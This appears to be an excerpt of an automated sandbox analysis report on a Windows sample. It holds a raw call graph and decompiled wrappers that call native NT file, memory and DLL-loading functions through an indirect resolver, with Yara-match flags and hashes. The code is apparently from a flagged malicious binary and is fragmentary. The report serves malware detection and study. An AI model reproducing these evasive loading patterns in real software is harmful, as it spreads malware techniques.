22636->22622 22759 41a4f0 22637->22759 22639 41be8d 22639->22530 22641 414cc1 22640->22641 22642 414cc9 22640->22642 22641->22532 22664 414f9c 22642->22664 22762 41d090 22642->22762 22644 414d1d 22645 41d090 2 API calls 22644->22645 22649 414d28 22645->22649 22646 414d76 22648 41d090 2 API calls 22646->22648 22650 414d8a 22648->22650 22649->22646 22767 41d130 22649->22767 22651 41d090 2 API calls 22650->22651 22653 414dfd 22651->22653 22652 41d090 2 API calls 22660 414e45 22652->22660 22653->22652 22655 414f74 22774 41d0f0 LdrLoadDll RtlFreeHeap 22655->22774 22657 414f7e 22775 41d0f0 LdrLoadDll RtlFreeHeap 22657->22775 22659 414f88 22776 41d0f0 LdrLoadDll RtlFreeHeap 22659->22776 22773 41d0f0 LdrLoadDll RtlFreeHeap 22660->22773 22662 414f92 22777 41d0f0 LdrLoadDll RtlFreeHeap 22662->22777 22664->22532 22666 415fe1 22665->22666 22667 415690 6 API calls 22666->22667 22672 415ff7 22667->22672 22668 416000 22668->22536 22669 416037 22670 41bee0 2 API calls 22669->22670 22671 416048 22670->22671 22671->22536 22672->22668 22672->22669 22673 416083 22672->22673 22674 41bee0 2 API calls 22673->22674 22675 416088 22674->22675 22675->22536 22778 41abe0 22676->22778 22678 41ad64 22679 41abe0 LdrLoadDll 22678->22679 22680 41ad6d 22679->22680 22681 41abe0 LdrLoadDll 22680->22681 22682 41ad76 22681->22682 22683 41abe0 LdrLoadDll 22682->22683 22684 41ad7f 22683->22684 22685 41abe0 LdrLoadDll 22684->22685 22686 41ad88 22685->22686 22687 41abe0 LdrLoadDll 22686->22687 22688 41ad91 22687->22688 22689 41abe0 LdrLoadDll 22688->22689 22690 41ad9d 22689->22690 22691 41abe0 LdrLoadDll 22690->22691 22692 41ada6 22691->22692 22693 41abe0 LdrLoadDll 22692->22693 22694 41adaf 22693->22694 22695 41abe0 LdrLoadDll 22694->22695 22696 41adb8 22695->22696 22697 41abe0 LdrLoadDll 22696->22697 22698 41adc1 22697->22698 22699 41abe0 LdrLoadDll 22698->22699 22700 41adca 22699->22700 22701 41abe0 LdrLoadDll 22700->22701 22702 41add6 22701->22702 22703 41abe0 LdrLoadDll 22702->22703 22704 41addf 22703->22704 22705 41abe0 LdrLoadDll 22704->22705 22706 41ade8 22705->22706 22707 41abe0 LdrLoadDll 22706->22707 22708 41adf1 22707->22708 22709 41abe0 LdrLoadDll 22708->22709 22710 41adfa 22709->22710 22711 41abe0 LdrLoadDll 22710->22711 22712 41ae03 22711->22712 22713 41abe0 LdrLoadDll 22712->22713 22714 41ae0f 22713->22714 22715 41abe0 LdrLoadDll 22714->22715 22716 41ae18 22715->22716 22717 41abe0 LdrLoadDll 22716->22717 22718 41ae21 22717->22718 22719 41abe0 LdrLoadDll 22718->22719 22720 41ae2a 22719->22720 22721 41abe0 LdrLoadDll 22720->22721 22722 41ae33 22721->22722 22723 41abe0 LdrLoadDll 22722->22723 22724 41ae3c 22723->22724 22725 41abe0 LdrLoadDll 22724->22725 22726 41ae48 22725->22726 22727 41abe0 LdrLoadDll 22726->22727 22728 41ae51 22727->22728 22729 41abe0 LdrLoadDll 22728->22729 22730 41ae5a 22729->22730 22731 41abe0 LdrLoadDll 22730->22731 22732 41ae63 22731->22732 22733 41abe0 LdrLoadDll 22732->22733 22734 41ae6c 22733->22734 22735 41abe0 LdrLoadDll 22734->22735 22736 41ae75 22735->22736 22737 41abe0 LdrLoadDll 22736->22737 22738 41ae81 22737->22738 22739 41abe0 LdrLoadDll 22738->22739 22740 41ae8a 22739->22740 22741 41abe0 LdrLoadDll 22740->22741 22742 41ae93 22741->22742 22743 41abe0 LdrLoadDll 22742->22743 22744 41ae9c 22743->22744 22745 41abe0 LdrLoadDll 22744->22745 22746 41aea5 22745->22746 22747 41abe0 LdrLoadDll 22746->22747 22748 41aeae 22747->22748 22749 41abe0 LdrLoadDll 22748->22749 22750 41aeba 22749->22750 22751 41abe0 LdrLoadDll 22750->22751 22752 41aec3 22751->22752 22753 41abe0 LdrLoadDll 22752->22753 22754 41aecc 22753->22754 22754->22540 22756 41af60 LdrLoadDll 22755->22756 22757 419e8c 22756->22757 22757->22461 22758->22537 22760 41a50c NtAllocateVirtualMemory 22759->22760 22761 41af60 LdrLoadDll 22759->22761 22760->22639 22761->22760 22763 41d0a0 22762->22763 22764 41d0a6 22762->22764 22763->22644 22765 41c0b0 2 API calls 22764->22765 22766 41d0cc 22765->22766 22766->22644 22768 41d155 22767->22768 22769 41d18d 22767->22769 22770 41c0b0 2 API calls 22768->22770 22769->22649 22771 41d16a 22770->22771 22772 41bee0 2 API calls 22771->22772 22772->22769 22773->22655 22774->22657 22775->22659 22776->22662 22777->22664 22779 41abfb 22778->22779 22780 415a90 LdrLoadDll 22779->22780 22782 41ac1b 22780->22782 22781 41accf 22781->22678 22782->22781 22783 415a90 LdrLoadDll 22782->22783 22783->22781 22785 41af60 LdrLoadDll 22784->22785 22786 41a63c RtlFreeHeap 22785->22786 22786->22548 22788 407220 22787->22788 22789 40721b 22787->22789 22790 41be60 2 API calls 22788->22790 22789->22469 22796 407245 22790->22796 22791 4072a8 22791->22469 22792 419e70 LdrLoadDll 22792->22796 22793 4072ae 22795 4072d4 22793->22795 22797 41a570 LdrLoadDll 22793->22797 22795->22469 22796->22791 22796->22792 22796->22793 22798 41be60 2 API calls 22796->22798 22803 41a570 22796->22803 22799 4072c5 22797->22799 22798->22796 22799->22469 22801 41a570 LdrLoadDll 22800->22801 22802 4074ee 22801->22802 22802->22430 22804 41a58c 22803->22804 22805 41af60 LdrLoadDll 22803->22805 22804->22796 22805->22804 22807 41b623 22806->22807 22810 40a130 22807->22810 22811 40a154 22810->22811 22812 40a190 LdrLoadDll 22811->22812 22813 40905a 22811->22813 22812->22813 22813->22436 22816 40a4a3 22814->22816 22815 40a520 22815->22443 22816->22815 22827 419c40 LdrLoadDll 22816->22827 22819 41af60 LdrLoadDll 22818->22819 22820 40d59b 22819->22820 22820->22446 22821 41a780 22820->22821 22822 41a79f LookupPrivilegeValueW 22821->22822 22823 41af60 LdrLoadDll 22821->22823 22822->22448 22823->22822 22825 41a22c 22824->22825 22826 41af60 LdrLoadDll 22824->22826 22825->22449 22826->22825 22827->22815 22829 40a627 22828->22829 22830 40a480 LdrLoadDll 22829->22830 22831 40a656 22830->22831 22831->22373 22833 40d68a 22832->22833 22841 40d740 22832->22841 22834 40a480 LdrLoadDll 22833->22834 22835 40d6ac 22834->22835 22842 419ef0 22835->22842 22837 40d6ee 22845 419f30 22837->22845 22840 41a440 2 API calls 22840->22841 22841->22376 22841->22377 22843 419f0c 22842->22843 22844 41af60 LdrLoadDll 22842->22844 22843->22837 22844->22843 22846 419f3f 22845->22846 22847 41af60 LdrLoadDll 22846->22847 22848 40d734 22847->22848 22848->22840 22850 40a28d 22849->22850 22851 40a291 22849->22851 22850->22388 22852 40a2aa 22851->22852 22853 40a2dc 22851->22853 22897 419c80 LdrLoadDll 22852->22897 22898 419c80 LdrLoadDll 22853->22898 22855 40a2ed 22855->22388 22857 40a2cc 22857->22388 22859 40d7f0 LdrLoadDll 22858->22859 22860 415006 22859->22860 22860->22390 22862 407edc 22861->22862 22863 407e2e 22861->22863 22864 407f9c 22862->22864 22867 407210 2 API calls 22862->22867 22869 407fba 22862->22869 22865 407210 2 API calls 22863->22865 22864->22869 22932 40da60 6 API calls 22864->22932 22871 407e38 22865->22871 22874 407efd 22867->22874 22868 407fb0 22868->22392 22869->22392 22871->22862 22873 407ed2 22871->22873 22899 407b10 22871->22899 22872 407b10 8 API calls 22872->22874 22875 4074d0 LdrLoadDll 22873->22875 22874->22864 22874->22872 22876 407f92 22874->22876 22875->22862 22877 4074d0 LdrLoadDll 22876->22877 22877->22864 22879 41af60 LdrLoadDll 22878->22879 22880 40ad62 22879->22880 22881 40d7f0 22880->22881 22882 40d80d 22881->22882 23061 419f70 22882->23061 22885 40d855 22885->22396 22886 419fc0 LdrLoadDll 22887 40d87e 22886->22887 22887->22396 22889 41af60 LdrLoadDll 22888->22889 22890 40adc5 22889->22890 22890->22402 22890->22405 22892 41af60 LdrLoadDll 22891->22892 22893 40ae99 22892->22893 22893->22413 22895 41af60 LdrLoadDll 22894->22895 22896 40aeec 22895->22896 22896->22417 22897->22857 22898->22855 22900 407b35 22899->22900 22933 419cc0 22900->22933 22903 407b89 22903->22871 22904 407c0a 22968 40d940 LdrLoadDll NtClose 22904->22968 22905 419eb0 LdrLoadDll 22906 407bad 22905->22906 22906->22904 22907 407bb8 22906->22907 22909 407c36 22907->22909 22936 40af00 22907->22936 22909->22871 22910 407c25 22912 407c42 22910->22912 22913 407c2c 22910->22913 22969 419d40 LdrLoadDll 22912->22969 22915 41a440 2 API calls 22913->22915 22914 407bd2 22914->22909 22956 407940 22914->22956 22915->22909 22917 407c6d 22919 40af00 2 API calls 22917->22919 22921 407c8d 22919->22921 22921->22909 22970 419d70 LdrLoadDll 22921->22970 22923 407cb2 22971 419e00 LdrLoadDll 22923->22971 22925 407ccc 22926 419dd0 LdrLoadDll 22925->22926 22927 407cdb 22926->22927 22928 41a440 2 API calls 22927->22928 22929 407ce5 22928->22929 22972 407710 22929->22972 22931 407cf9 22931->22871 22932->22868 22934 41af60 LdrLoadDll 22933->22934 22935 407b7f 22934->22935 22935->22903 22935->22904 22935->22905 22937 40af2b 22936->22937 22938 40d7f0 LdrLoadDll 22937->22938 22939 40af8a 22938->22939 22940 40afd3 22939->22940 22941 419fc0 LdrLoadDll 22939->22941 22940->22914 22942 40afb5 22941->22942 22943 40afbc 22942->22943 22946 40afdf 22942->22946 22944 41a010 LdrLoadDll 22943->22944 22945 40afc9 22944->22945 22947 41a440 2 API calls 22945->22947 22948 40b049 22946->22948 22949 40b029 22946->22949 22947->22940 22951 41a010 LdrLoadDll 22948->22951 22950 41a440 2 API calls 22949->22950 22952 40b036 22950->22952 22953 40b05b 22951->22953 22952->22914 22954 41a440 2 API calls 22953->22954 22955 40b065 22954->22955 22955->22914 22957 407956 22956->22957 22988 419830 22957->22988 22959 40796f 22964 407ae1 22959->22964 23009 407510 22959->23009 22961 407a55 22962 407710 7 API calls 22961->22962 22961->22964 22963 407a83 22962->22963 22963->22964 22965 419eb0 LdrLoadDll 22963->22965 22964->22871 22966 407ab8 22965->22966 22966->22964 22967 41a4b0 LdrLoadDll 22966->22967 22967->22964 22968->22910 22969->22917 22970->22923 22971->22925 22973 407739 22972->22973 23043 407680 22973->23043 22976 41a4b0 LdrLoadDll 22977 40774c 22976->22977 22977->22976 22978 4077d7 22977->22978 22980 4077d2 22977->22980 23051 40d9c0 22977->23051 22978->22931 22979 41a440 2 API calls 22981 40780a 22979->22981 22980->22979 22981->22978 22982 419cc0 LdrLoadDll 22981->22982 22983 40786f 22982->22983 22983->22978 23055 419d00 22983->23055 22985 4078d3 22985->22978 22986 415690 6 API calls 22985->22986 22987 407928 22986->22987 22987->22931 22989 41c0b0 2 API calls 22988->22989 22990 419847 22989->22990 23016 408760 22990->23016 22992 419862 22993 419889 22992->22993 22994 4198a0 22992->22994 22995 41bee0 2 API calls 22993->22995 22996 41be60 2 API calls 22994->22996 22997 419896 22995->22997 22998 4198da 22996->22998 22997->22959 22999 41be60 2 API calls 22998->22999 23000 4198f3 22999->23000 23006 419b94 23000->23006 23022 41bea0 23000->23022 23003 419b80 23004 41bee0 2 API calls 23003->23004 23005 419b8a 23004->23005 23005->22959 23007 41bee0 2 API calls 23006->23007 23008 419be9 23007->23008 23008->22959 23010 40760f 23009->23010 23011 407525 23009->23011 23010->22961 23011->23010 23012 415690 6 API calls 23011->23012 23014 407592 23012->23014 23013 4075b9 23013->22961 23014->23013 23015 41bee0 2 API calls 23014->23015 23015->23013 23017 408785 23016->23017 23018 40a130 LdrLoadDll 23017->23018 23019 4087b8 23018->23019 23021 4087dd 23019->23021 23025 40b930 23019->23025 23021->22992 23040 41a530 23022->23040 23026 40b95c 23025->23026 23027 41a190 LdrLoadDll 23026->23027 23028 40b975 23027->23028 23029 40b97c 23028->23029 23036 41a1d0 23028->23036 23029->23021 23033 40b9b7 23034 41a440 2 API calls 23033->23034 23035 40b9da 23034->23035 23035->23021 23037 41af60 LdrLoadDll 23036->23037 23038 40b99f 23036->23038 23037->23038 23038->23029 23039 41a7c0 LdrLoadDll 23038->23039 23039->23033 23041 41af60 LdrLoadDll 23040->23041 23042 419b79 23041->23042 23042->23003 23042->23006 23044 407698 23043->23044 23045 40a130 LdrLoadDll 23044->23045 23046 4076b3 23045->23046 23047 415a90 LdrLoadDll 23046->23047 23048 4076c3 23047->23048 23049 4076cc PostThreadMessageW 23048->23049 23050 4076e0 23048->23050 23049->23050 23050->22977 23052 40d9d3 23051->23052 23058 419e40 23052->23058 23056 419d1c 23055->23056 23057 41af60 LdrLoadDll 23055->23057 23056->22985 23057->23056 23059 41af60 LdrLoadDll 23058->23059 23060 40d9fe 23059->23060 23060->22977 23062 41af60 LdrLoadDll 23061->23062 23063 40d84e 23062->23063 23063->22885 23063->22886

              Executed Functions

              Function 0041A368 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70filenativeCOMMON
              Download Yara Rule

              Control-flow Graph

              C-Code - Quality: 37%
              			E0041A368(void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40, void* _a44) {

				asm("repne add ah, [0x2f344935]");
				if (__eflags >= 0) goto L3;
			}



              0x0041a368
              0x0041a36f

              APIs
              • NtReadFile.NTDLL(004159B2,5DA515B3,FFFFFFFF,?,?,?,004159B2,?,qVA,FFFFFFFF,5DA515B3,004159B2,?,00000000), ref: 0041A405
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID: FileRead
              • String ID: ZUA$qVA
              • API String ID: 2738559852-3024105696
              • Opcode ID: d076181294628f61b5ffb9e54f19e727403ec0c8bc439c4acaee68367e2c69a1
              • Instruction ID: e3bf853c9b3b2f146e70fd2481cd6938a8fa9f888ecdbdf632ae88522e541e96
              • Opcode Fuzzy Hash: d076181294628f61b5ffb9e54f19e727403ec0c8bc439c4acaee68367e2c69a1
              • Instruction Fuzzy Hash: 6821D3B2200108AFCB14DF99DC84EEB77ADEF8C724F158249BA0DA7241D634E811CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0041A3C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 11 41a3c0-41a409 call 41af60 NtReadFile
              C-Code - Quality: 37%
              			E0041A3C0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
				intOrPtr _t13;
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _t13 + 0xc64;
				E0041AF60( *((intOrPtr*)(_t13 + 0x14)), _t13, _t28,  *((intOrPtr*)(_t13 + 0x14)), 0, 0x2a);
				_t4 =  &_a40; // 0x415671
				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4, _t27); // executed
				return _t18;
			}







              0x0041a3c3
              0x0041a3cf
              0x0041a3d7
              0x0041a3dc
              0x0041a405
              0x0041a409

              APIs
              • NtReadFile.NTDLL(004159B2,5DA515B3,FFFFFFFF,?,?,?,004159B2,?,qVA,FFFFFFFF,5DA515B3,004159B2,?,00000000), ref: 0041A405
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID: FileRead
              • String ID: qVA
              • API String ID: 2738559852-1195921569
              • Opcode ID: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
              • Instruction ID: 73ffa567400af51592167d85ddd4e2221f8c27920a6f65a97cb7e9eff46762f8
              • Opcode Fuzzy Hash: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
              • Instruction Fuzzy Hash: 99F0B7B2200208AFCB14DF99DC85EEB77ADEF8C754F158249BE0D97241D630E811CBA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040A130 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 270 40a130-40a159 call 41cdb0 273 40a15b-40a15e 270->273 274 40a15f-40a16d call 41d1d0 270->274 277 40a17d-40a18e call 41b500 274->277 278 40a16f-40a17a call 41d450 274->278 283 40a190-40a1a4 LdrLoadDll 277->283 284 40a1a7-40a1aa 277->284 278->277 283->284
              C-Code - Quality: 100%
              			E0040A130(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041CDB0( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D1D0(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D450( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B500(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













              0x0040a14c
              0x0040a14f
              0x0040a154
              0x0040a159
              0x0040a163
              0x0040a168
              0x0040a16b
              0x0040a16d
              0x0040a175
              0x0040a17a
              0x0040a17a
              0x0040a181
              0x0040a189
              0x0040a18c
              0x0040a18e
              0x0040a1a2
              0x00000000
              0x0040a1a4
              0x0040a1aa
              0x0040a15e
              0x0040a15e
              0x0040a15e

              APIs
              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040A1A2
              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID: Load
              • String ID:
              • API String ID: 2234796835-0
              • Opcode ID: 14d9637ae75740dab2169e9387d270c154b89039a09ccd4394a8d994bcbcbc66
              • Instruction ID: 362e94697f91f25e03f34ab22cb5edf479b96fa73b6a4b5d0a09f6ce58eb7145
              • Opcode Fuzzy Hash: 14d9637ae75740dab2169e9387d270c154b89039a09ccd4394a8d994bcbcbc66
              • Instruction Fuzzy Hash: 8D0112B5D4020DB7DB10DBA5DC42FDEB7789B54308F0041A6A908A7281F675EB54CB95
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0041A30A Relevance: 1.5, APIs: 1, Instructions: 43filenativeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 285 41a30a-41a361 call 41af60 NtCreateFile
              C-Code - Quality: 82%
              			E0041A30A(void* __ebx, void* __ecx, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
				intOrPtr _v0;
				signed int _v117;
				long _t23;

				asm("fdivr qword [ecx]");
				_v117 =  !_v117;
				_t17 = _v0;
				_t5 = _t17 + 0xc5c; // 0xc5c
				E0041AF60( *((intOrPtr*)(_v0 + 0x14)), _t17, _t5,  *((intOrPtr*)(_v0 + 0x14)), 0, 0x28);
				_t23 = NtCreateFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
				return _t23;
			}






              0x0041a30d
              0x0041a30f
              0x0041a313
              0x0041a31f
              0x0041a327
              0x0041a35d
              0x0041a361

              APIs
              • NtCreateFile.NTDLL(00000060,00409103,?,004157F7,00409103,FFFFFFFF,?,?,FFFFFFFF,00409103,004157F7,?,00409103,00000060,00000000,00000000), ref: 0041A35D
              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 1b0bd2e8079d7939140556f8ae2cccb929dca85db97a20e1c5a5149061a2b3bc
              • Instruction ID: 24359d01ba3b756db5b113e6b13360880a0a9df5b3c4029a8eda21933aac747e
              • Opcode Fuzzy Hash: 1b0bd2e8079d7939140556f8ae2cccb929dca85db97a20e1c5a5149061a2b3bc
              • Instruction Fuzzy Hash: 6101AFB6201508AFCB58CF99DC85EEB77A9EF8C754F118258BA0DD7241C630E855CBA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0041A310 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 288 41a310-41a326 289 41a32c-41a361 NtCreateFile 288->289 290 41a327 call 41af60 288->290 290->289
              C-Code - Quality: 100%
              			E0041A310(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xc5c; // 0xc5c
				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




              0x0041a31f
              0x0041a327
              0x0041a35d
              0x0041a361

              APIs
              • NtCreateFile.NTDLL(00000060,00409103,?,004157F7,00409103,FFFFFFFF,?,?,FFFFFFFF,00409103,004157F7,?,00409103,00000060,00000000,00000000), ref: 0041A35D
              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
              • Instruction ID: 22a17d5a8ca0ee81e299f457139f331d0ae15f1ba5b0ed3d189dcc3aa1234c62
              • Opcode Fuzzy Hash: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
              • Instruction Fuzzy Hash: 9CF06DB6215208AFCB48DF89DC85EEB77ADAF8C754F158248BA0D97241D630F8518BA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0041A4EA Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 291 41a4ea-41a52d call 41af60 NtAllocateVirtualMemory
              C-Code - Quality: 68%
              			E0041A4EA(void* __ecx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t16;
				signed int _t30;

				asm("stc");
				asm("stc");
				 *(__ecx - 0x74aa5b16) =  *(__ecx - 0x74aa5b16) & _t30;
				_t12 = _a4;
				_t5 = _t12 + 0xc7c; // 0x3c7c
				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t12, _t5,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t16;
			}





              0x0041a4ea
              0x0041a4eb
              0x0041a4ec
              0x0041a4f3
              0x0041a4ff
              0x0041a507
              0x0041a529
              0x0041a52d

              APIs
              • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041B19D,?,0041B19D,?,00000000,?,00003000,00000040,00409103,00000000), ref: 0041A529
              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID: AllocateMemoryVirtual
              • String ID:
              • API String ID: 2167126740-0
              • Opcode ID: 36b501dc3894cc984797b1e69cf50bb0c9ea7290d1c0289243be7655b3b9efa6
              • Instruction ID: 109ee34d3ff9456264eec04b043a8d4e8155308b6a1c2191eb1202ba25fb2190
              • Opcode Fuzzy Hash: 36b501dc3894cc984797b1e69cf50bb0c9ea7290d1c0289243be7655b3b9efa6
              • Instruction Fuzzy Hash: 56F0F8B2210109AFDB14DF99DC85EE77BA9EF8C354F118159FA0C97241C631E911CBA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0041A4F0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 294 41a4f0-41a506 295 41a50c-41a52d NtAllocateVirtualMemory 294->295 296 41a507 call 41af60 294->296 296->295
              C-Code - Quality: 100%
              			E0041A4F0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				_t3 = _a4 + 0xc7c; // 0x3c7c
				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t10, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




              0x0041a4ff
              0x0041a507
              0x0041a529
              0x0041a52d

              APIs
              • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041B19D,?,0041B19D,?,00000000,?,00003000,00000040,00409103,00000000), ref: 0041A529
              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID: AllocateMemoryVirtual
              • String ID:
              • API String ID: 2167126740-0
              • Opcode ID: 3937d7bcd71450592b7c43b4c62eb3862b139fe450dcdc5e45fc7760e87cf521
              • Instruction ID: 0f6e90ac6ad316f0230f9505ffb1913ba8f116b783957ff2d7da3ee6bc7086c1
              • Opcode Fuzzy Hash: 3937d7bcd71450592b7c43b4c62eb3862b139fe450dcdc5e45fc7760e87cf521
              • Instruction Fuzzy Hash: 53F0F2B2210208ABDB14DF89DC81EAB77ADAF8C654F118109BA0897241C630E8118BA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0041A43A Relevance: 1.5, APIs: 1, Instructions: 23nativeCOMMON
              Download Yara Rule
              C-Code - Quality: 68%
              			E0041A43A(void* __edx, intOrPtr _a6, void* _a10) {
				long _t8;

				asm("repne pop ecx");
				_push(_t17);
				_t5 = _a6;
				_t2 = _t5 + 0x14; // 0x56c29f0f
				_t3 = _t5 + 0xc6c; // 0x409d6f
				E0041AF60( *_t2, _a6, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a10); // executed
				return _t8;
			}




              0x0041a43a
              0x0041a440
              0x0041a443
              0x0041a446
              0x0041a44f
              0x0041a457
              0x0041a465
              0x0041a469

              APIs
              • NtClose.NTDLL(00415990,?,?,00415990,00409103,FFFFFFFF), ref: 0041A465
              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID: Close
              • String ID:
              • API String ID: 3535843008-0
              • Opcode ID: 07d3615e569112840bfe7dd77fc094030ad989f6c3310b4ed0bc81daf31d026e
              • Instruction ID: 8ff0d7f8c4ded86d2cb5c71ed39f3bb509a75d1910e10b9b06dc07b0e4a5616b
              • Opcode Fuzzy Hash: 07d3615e569112840bfe7dd77fc094030ad989f6c3310b4ed0bc81daf31d026e
              • Instruction Fuzzy Hash: 63E08C72204204ABD610EF94DCC6ED77BA8DF48624F248096FA085B242D535E50086E0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0041A440 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E0041A440(intOrPtr _a4, void* _a8) {
				long _t8;

				_t5 = _a4;
				_t2 = _t5 + 0x14; // 0x56c29f0f
				_t3 = _t5 + 0xc6c; // 0x409d6f
				E0041AF60( *_t2, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




              0x0041a443
              0x0041a446
              0x0041a44f
              0x0041a457
              0x0041a465
              0x0041a469

              APIs
              • NtClose.NTDLL(00415990,?,?,00415990,00409103,FFFFFFFF), ref: 0041A465
              Memory Dump Source
